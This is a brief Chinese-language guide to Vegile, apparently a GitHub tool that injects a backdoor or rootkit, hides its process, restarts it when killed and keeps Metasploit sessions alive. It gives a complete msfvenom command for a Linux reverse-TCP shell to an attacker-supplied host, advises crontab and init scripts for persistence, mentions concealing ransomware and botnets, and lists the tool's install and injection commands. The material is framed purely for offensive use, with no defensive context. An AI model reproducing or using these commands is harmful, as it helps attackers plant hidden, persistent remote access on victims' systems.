GitHub开源的项目Vegile

原理

这个工具将会设置你的后门/rootkit，它将隐藏你的spesisifc进程，在metasploit中无限制地产生会话，并且这一过程是透明的。后门即使被杀，也会重新运行。在运行另一个进程时总会有一个过程在待命，所以我们可以认为这个过程是不可改变的，就像“shell中的鬼”

• 现在我将使用msf命令中的reverse_shell来测试后门，我的后门针对的是linux，你也可以使用thefatrat创建一个简单的后门。
• msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=IP LPORT=PORT -b "\x00" -f elf -o NAME_BACKDOOR
• 对于隐藏你可以使用rootkits,backdoor,ransom and botnet（脚本，python，perl，exe或者binary）
• 为了获得持久性，你可以使用crontab和xinit.d进入你的后门

命令

先拉取项目

git clone https://github.com/Screetsec/Vegile.git
cd Vegile
chmod +x Vegile

参数

Vegile -i / --inject [backdoor/rootkit]
Vegile -u / --unlimited [backdoor/rootkit]
Vegile -h / --help